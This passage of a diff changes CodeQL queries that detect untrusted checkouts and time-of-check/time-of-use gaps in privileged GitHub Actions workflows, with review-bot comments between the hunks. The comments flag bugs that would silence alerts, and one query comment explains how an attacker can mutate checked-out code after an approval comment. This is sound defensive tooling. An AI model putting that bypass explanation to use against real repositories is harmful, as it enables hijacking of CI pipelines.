++++++++--- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 40 +++++++--- .../CWE-829/UntrustedCheckoutCritical.ql | 8 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 8 +- ql/src/qlpack.yml | 2 +- .../UntrustedCheckoutTOCTOUCritical.expected | 27 ++++++- .../UntrustedCheckoutCritical.expected | 24 +++--- .../CWE-829/UntrustedCheckoutHigh.expected | 41 +++++------ 13 files changed, 227 insertions(+), 81 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index e837c6fcb30..5e7c6d77c3e 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -198,6 +198,8 @@ abstract class Job extends AstNode instanceof JobImpl { If getIf() { result = super.getIf() } + Environment getEnvironment() { result = super.getEnvironment() } + Permissions getPermissions() { result = super.getPermissions() } Event getATriggerEvent() { result = super.getATriggerEvent() } 
@@ -242,6 +244,15 @@ class If extends AstNode instanceof IfImpl { string getConditionStyle() { result = super.getConditionStyle() } } +/** + * An Environemnt node representing a deployment environment. + */ +class Environment extends AstNode instanceof EnvironmentImpl { + string getName() { result = super.getName() } + + Expression getNameExpr() { result = super.getNameExpr() } +} + abstract class Uses extends AstNode instanceof UsesImpl { string getCallee() { result = super.getCallee() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 2deb987650c..9d2a5b38206 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -82,6 +82,7 @@ private newtype TAstNode = exists(YamlMapping m | m.lookup("steps").(YamlSequence).getElementNode(_) = n) } or TIfNode(YamlValue n) { exists(YamlMapping m | m.lookup("if") = n) } or + TEnvironmentNode(YamlValue n) { exists(YamlMapping m | m.lookup("environment") = n) } or TEnvNode(YamlMapping n) { exists(YamlMapping m | m.lookup("env") = n) } or TScalarValueNode(YamlScalar n) { exists(YamlMapping m | m.maps(_, n) or m.lookup(_).(YamlSequence).getElementNode(_) = n) @@ -793,6 +794,9 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the condition that must be satisfied for this job to run. */ IfImpl getIf() { result.getNode() = n.lookup("if") } + /** Gets the deployment environment to run the job on. */ + EnvironmentImpl getEnvironment() { result.getNode() = n.lookup("environment") } + /** Gets the permissions for this job. */ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } 
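Review bot: The QLDoc on the new `Environment` class misspells the name (`An Environemnt node …`); it should read `An Environment node representing a deployment environment.` The accessors `getName()` and `getNameExpr()` have no QLDoc here; one line each, e.g. `/** Gets the environment name when it is a plain scalar. */` and `/** Gets the expression used as the environment name, if any. */`, would do. The matching `EnvironmentImpl.getNameExpr()` in ast/internal/Ast.qll carries the copy-pasted text `Gets the environmen name.`, which is both misspelled and describes `getName()` rather than the expression.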
@@ -976,6 +980,30 @@ class StepImpl extends AstNodeImpl, TStepNode { } } +class EnvironmentImpl extends AstNodeImpl, TEnvironmentNode { + YamlValue n; + + EnvironmentImpl() { this = TEnvironmentNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "EnvironmentImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlScalar getNode() { result = n } + + /** Gets the environment name. */ + string getName() { result = n.(YamlScalar).getValue() } + + /** Gets the environmen name. */ + ExpressionImpl getNameExpr() { result.getParentNode().getNode() = n } +} + class IfImpl extends AstNodeImpl, TIfNode { YamlValue n; diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index fdafda1fc27..28bc938f8c8 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
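Review bot: `EnvironmentImpl` only handles the scalar form of `environment:`: `getNode()` is typed `YamlScalar` and `getName()` casts `n.(YamlScalar)`, but GitHub Actions also accepts a mapping with `name` and `url` keys, and `TEnvironmentNode` admits any `YamlValue`. For the mapping form `getNode()` has no result, so `JobImpl.getEnvironment()` would presumably find nothing and the job would not be recognised as environment-gated by ControlChecks.qll. I would return `YamlValue` from `getNode()` and resolve the name from either form, as sketched below; a test workflow using the mapping form would confirm it.

```ql
// … unchanged: EnvironmentImpl header, toString, child/parent accessors, getLocation …
override YamlValue getNode() { result = n }

/** Gets the environment name, for both the scalar and the `name:` mapping form. */
string getName() {
  result = n.(YamlScalar).getValue()
  or
  result = n.(YamlMapping).lookup("name").(YamlScalar).getValue()
}
```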
@@ -1,17 +1,49 @@ import actions /** An If node that contains an actor, user or label check */ -abstract class ControlCheck extends If { +abstract class ControlCheck extends AstNode { + ControlCheck() { + this instanceof If or + this instanceof Environment or + this instanceof UsesStep + } + predicate dominates(Step step) { - step.getIf() = this or - step.getEnclosingJob().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + this instanceof If and + ( + step.getIf() = this or + step.getEnclosingJob().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + ) + or + this instanceof Environment and + ( + step.getEnclosingJob().getEnvironment() = this + or + step.getEnclosingJob().getANeededJob().getEnvironment() = this + ) + or + this.(UsesStep).getAFollowingStep() = step } } -class LabelControlCheck extends ControlCheck { - LabelControlCheck() { +abstract class AssociationCheck extends ControlCheck { } + +abstract class ActorCheck extends ControlCheck { } + +abstract class RepositoryCheck extends ControlCheck { } + +abstract class LabelCheck extends ControlCheck { } + +abstract class PermissionCheck extends ControlCheck { } + +class EnvironmentCheck extends ControlCheck instanceof Environment { + EnvironmentCheck() { any() } +} + +class LabelIfCheck extends LabelCheck instanceof If { + LabelIfCheck() { // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') // eg: github.event.label.name == 'safe to test' exists( 
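Review bot: `EnvironmentCheck() { any() }` treats every `environment:` key as an access check, but an environment only gates a job when protection rules such as required reviewers are configured in the repository settings, which the workflow file does not show. UntrustedCheckoutCritical.ql excludes any checkout dominated by a `ControlCheck`, so a job that merely names an unprotected environment drops out of that query and surfaces only in the TOCTOU ones. That assumption deserves a QLDoc on the class, for instance `/** A deployment environment, assumed (not verified) to have protection rules. */`. The class comment `An If node that contains an actor, user or label check` is also stale now that `ControlCheck` extends `AstNode` and covers `Environment` and `UsesStep`.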
@@ -23,8 +55,8 @@ class LabelControlCheck extends ControlCheck { } } -class ActorControlCheck extends ControlCheck { - ActorControlCheck() { +class ActorIfCheck extends ActorCheck instanceof If { + ActorIfCheck() { // eg: github.actor == 'dependabot[bot]' // eg: github.triggering_actor == 'CI Agent' // eg: github.event.pull_request.user.login == 'mybot' @@ -39,8 +71,8 @@ class ActorControlCheck extends ControlCheck { } } -class RepositoryControlCheck extends ControlCheck { - RepositoryControlCheck() { +class RepositoryIfCheck extends RepositoryCheck instanceof If { + RepositoryIfCheck() { // eg: github.repository == 'test/foo' exists( normalizeExpr(this.getCondition()) @@ -49,8 +81,8 @@ class RepositoryControlCheck extends ControlCheck { } } -class AssociationControlCheck extends ControlCheck { - AssociationControlCheck() { +class AssociationIfCheck extends AssociationCheck instanceof If { + AssociationIfCheck() { // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) exists( normalizeExpr(this.getCondition()) @@ -63,3 +95,18 @@ class AssociationControlCheck extends ControlCheck { } } +class AssociationActionCheck extends AssociationCheck instanceof UsesStep { + AssociationActionCheck() { + this.getCallee() = "TheModdingInquisition/actions-team-membership" and + not exists(this.getArgument("exit")) + or + this.getArgument("exit") = "true" + } +} + +class PermissionActionCheck extends PermissionCheck instanceof UsesStep { + PermissionActionCheck() { + this.getCallee() = "lannonbr/repo-permission-check-action" and + not this.getArgument("permission") = ["write", "admin"] + } +} diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 16c801a0bad..5518e074d30 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.9 +version: 0.1.10 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 
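Review bot: In `AssociationActionCheck` the `or` binds looser than `and`, so the characteristic predicate reads as (callee is `TheModdingInquisition/actions-team-membership` and no `exit` argument) or (`exit` is `"true"`), and the second branch holds for any `UsesStep` that passes `exit: true`, whatever action it calls. Such a step would then count as a `ControlCheck` and suppress untrusted-checkout alerts for the steps after it. Parenthesise the alternatives: `this.getCallee() = "TheModdingInquisition/actions-team-membership" and (not exists(this.getArgument("exit")) or this.getArgument("exit") = "true")`. In `PermissionActionCheck`, `not this.getArgument("permission") = ["write", "admin"]` looks inverted, since it accepts the step as a gate exactly when the required permission is absent or weaker than write; please confirm the intent.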
diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index 16ae5c5fe9b..cd7cefe2dd3 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -14,7 +14,7 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.ControlChecks -from LocalJob job, LabelControlCheck check, MutableRefCheckoutStep checkout, Event event +from LocalJob job, LabelCheck check, MutableRefCheckoutStep checkout, Event event where job = checkout.getEnclosingJob() and job.isPrivileged() and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 3a049f67dea..d28cca11a56 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -1,7 +1,7 @@ /** * @name Untrusted Checkout TOCTOU * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. - * @kind problem + * @kind path-problem * @problem.severity error * @precision high * @security-severity 9.3 
@@ -16,21 +16,43 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from ControlCheck check, MutableRefCheckoutStep checkout +query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } + +from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck check where - // the job can be triggered by an external user - inPrivilegedExternallyTriggerableJob(check) and + j = checkout.getEnclosingJob() and + j.getAStep() = checkout and + // the checkout is followed by a known poisonable step + checkout.getAFollowingStep() = s and + // the checkout occurs in a privileged context + ( + inPrivilegedCompositeAction(checkout) + or + inPrivilegedExternallyTriggerableJob(checkout) + ) and // the mutable checkout step is protected by an access check - check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and + check.dominates(checkout) and // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() instanceof PoisonableStep and ( - // label gates do not depend on the triggering event - check instanceof LabelControlCheck + // environment gates do not depend on the triggering event + check instanceof EnvironmentCheck or - // actor or association gates apply to IssueOps only - (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and + // label gates do not depend on the triggering event + check instanceof LabelCheck + or + // actor or association gates are only bypassable for IssueOps + // since an attacker can wait for a privileged user to comment on an issue + // and then mutate the checked-out code. 
+ // however, when used for pull_request_target, the check is not bypassable since + // the actor checked is the author of the PR + ( + check instanceof AssociationCheck or + check instanceof ActorCheck or + check instanceof PermissionCheck + ) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) -select checkout, "The checked-out code can be changed after the authorization check o step $@.", +select s, checkout, s, + "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index b9a1e4c6301..6448f1a05a8 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql 
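Review bot: The `where` clause binds `checkout.getAFollowingStep() = s` with `s` a `PoisonableStep` and later repeats `checkout.getAFollowingStep() instanceof PoisonableStep`; the second conjunct is redundant, as is `j.getAStep() = checkout` next to `j = checkout.getEnclosingJob()`. The block of `check instanceof …` alternatives with the `%_comment` trigger test is duplicated in UntrustedCheckoutTOCTOUHigh.ql, so a shared predicate in ControlChecks.qll would keep the two queries from drifting apart. The alert texts also differ without reason (`on check $@` here, `on step $@` in the High query) although both placeholders point at `check`.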
@@ -16,21 +16,37 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from ControlCheck check, MutableRefCheckoutStep checkout +from MutableRefCheckoutStep checkout, ControlCheck check where - // the job can be triggered by an external user - inPrivilegedExternallyTriggerableJob(check) and - // the mutable checkout step is protected by an access check - check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and - // there are no evidences that the checked-out code can lead to arbitrary code execution - not checkout.getAFollowingStep() instanceof PoisonableStep and + // the checkout occurs in a privileged context ( - // label gates do not depend on the triggering event - check instanceof LabelControlCheck + inPrivilegedCompositeAction(checkout) or - // actor or Association gates apply to IssueOps only - (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and + inPrivilegedExternallyTriggerableJob(checkout) + ) and + // there are no evidences that the checked-out gets executed + not checkout.getAFollowingStep() instanceof PoisonableStep and + // the mutable checkout step is protected by an access check + check.dominates(checkout) and + ( + // environment gates do not depend on the triggering event + check instanceof EnvironmentCheck + or + // label gates do not depend on the triggering event + check instanceof LabelCheck + or + // actor or association gates are only bypassable for IssueOps + // since an attacker can wait for a privileged user to comment on an issue + // and then mutate the checked-out code. 
+ // however, when used for pull_request_target, the check is not bypassable since + // the actor checked is the author of the PR + ( + check instanceof AssociationCheck or + check instanceof ActorCheck or + check instanceof PermissionCheck + ) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) -select checkout, "The checked-out code can be changed after the authorization check o step $@.", +select checkout, + "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 3a87b30be97..c1d72dd4664 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -26,12 +26,12 @@ where j.getAStep() = checkout and // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = s and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) and // the checkout occurs in a privileged context ( inPrivilegedCompositeAction(checkout) or inPrivilegedExternallyTriggerableJob(checkout) - ) -select s, checkout, s, "Potential unsafe checkout of untrusted code on a privileged workflow." + ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) +select s, checkout, s, "Execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index cb2f1cdaf95..468a1214c62 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql 
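Review bot: The new alert message ends in `on step $@`, but the placeholder is bound to `check`, a `ControlCheck`, and the preceding hunk words the same placeholder as `on check $@`. I would use `"Insufficient protection against execution of untrusted code on a privileged workflow on check $@."` here as well, so that the two TOCTOU queries read alike. The added comment `// there are no evidences that the checked-out gets executed` is missing a noun; `// there is no evidence that the checked-out code gets executed` says what is meant.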
@@ -24,12 +24,12 @@ where j.getAStep() = checkout and // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) and // the checkout occurs in a privileged context ( inPrivilegedCompositeAction(checkout) or inPrivilegedExternallyTriggerableJob(checkout) - ) -select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." + ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) +select checkout, "Potential execution of untrusted code on a privileged workflow." diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4f1173bd9ad..d4f97a32ec6 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.9 +version: 0.1.10 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index e3a42b3265d..01045ddde5e 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected 
@@ -1,2 +1,25 @@ -| .github/workflows/comment.yml:37:9:41:6 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/comment.yml:10:9:10:188 | ${{ git ... s ') }} | ${{ git ... s ') }} | -| .github/workflows/label.yml:13:9:17:6 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | +edges +| .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step | +| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:30:9:34:6 | Uses Step | +| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:34:9:37:6 | Run Step | +| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:37:9:41:6 | Uses Step | +| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:41:9:41:43 | Run Step | +| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:34:9:37:6 | Run Step | +| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | +| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | +| .github/workflows/comment.yml:34:9:37:6 | Run Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | +| .github/workflows/comment.yml:34:9:37:6 | Run Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | +| .github/workflows/comment.yml:37:9:41:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | +| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | +| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment.yml:16:10:22:7 | Uses 
Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | +| .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | +| .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | +| .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | +| .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step | +#select +| .github/workflows/comment.yml:41:9:41:43 | Run Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/comment.yml:10:9:10:188 | ${{ git ... s ') }} | ${{ git ... s ') }} | +| .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | +| .github/workflows/deployment.yml:30:10:31:53 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | +| .github/workflows/label.yml:17:9:17:41 | Run Step | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. 
| .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 5f4ba7a7b98..87289c178af 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -312,15 +312,15 @@ edges | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. 
| -| .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. 
| +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. 
| +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 9015e85b3d0..3619941aa12 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected 
@@ -1,21 +1,20 @@ -| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. 
